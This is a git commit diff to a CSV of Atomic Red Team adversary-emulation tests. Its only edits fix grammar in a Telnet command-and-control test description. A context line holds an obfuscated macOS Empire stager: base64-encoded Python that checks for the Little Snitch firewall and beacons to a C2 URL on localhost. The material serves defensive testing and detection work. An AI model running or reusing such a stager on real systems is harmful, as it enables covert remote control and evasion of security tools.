2024-08-26 - 11:09 IST - Atomic Red Attack Extraction

geopd · Aug 26, 2024 · 8ffeaa5 · 8ffeaa5
1 parent dba2f92
commit 8ffeaa5
Show file tree

Hide file tree

Showing 2 changed files with 3 additions and 3 deletions.
diff --git a/atomic-red-attacks.csv b/atomic-red-attacks.csv
@@ -25533,9 +25533,9 @@ You can use netcat to listen for the connection and verify execution, e.g. use "
 Reference: https://github.com/EmpireProject/Empire
 ",macos,,,"osascript -e ""do shell script \""echo \\\""import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\"" | python &\""""
 ",sh,,,,,,
-T1071,Application Layer Protocol,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,"An adversary may establish telnet communication from compromised endpoint to command and control (C2) server to be able to operate more attack on objectives.
+T1071,Application Layer Protocol,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,"An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.
 ",windows,,,"#{client_path} #{server_ip} --port #{server_port}
-",powershell,,,,powershell,"dependencies.0.description: Command and Control (C2) server cam be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with specified IP that must be reachable by client (telnet_client.exe)
+",powershell,,,,powershell,"dependencies.0.description: A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe)
 
 dependencies.0.prereq_command: $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
 if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}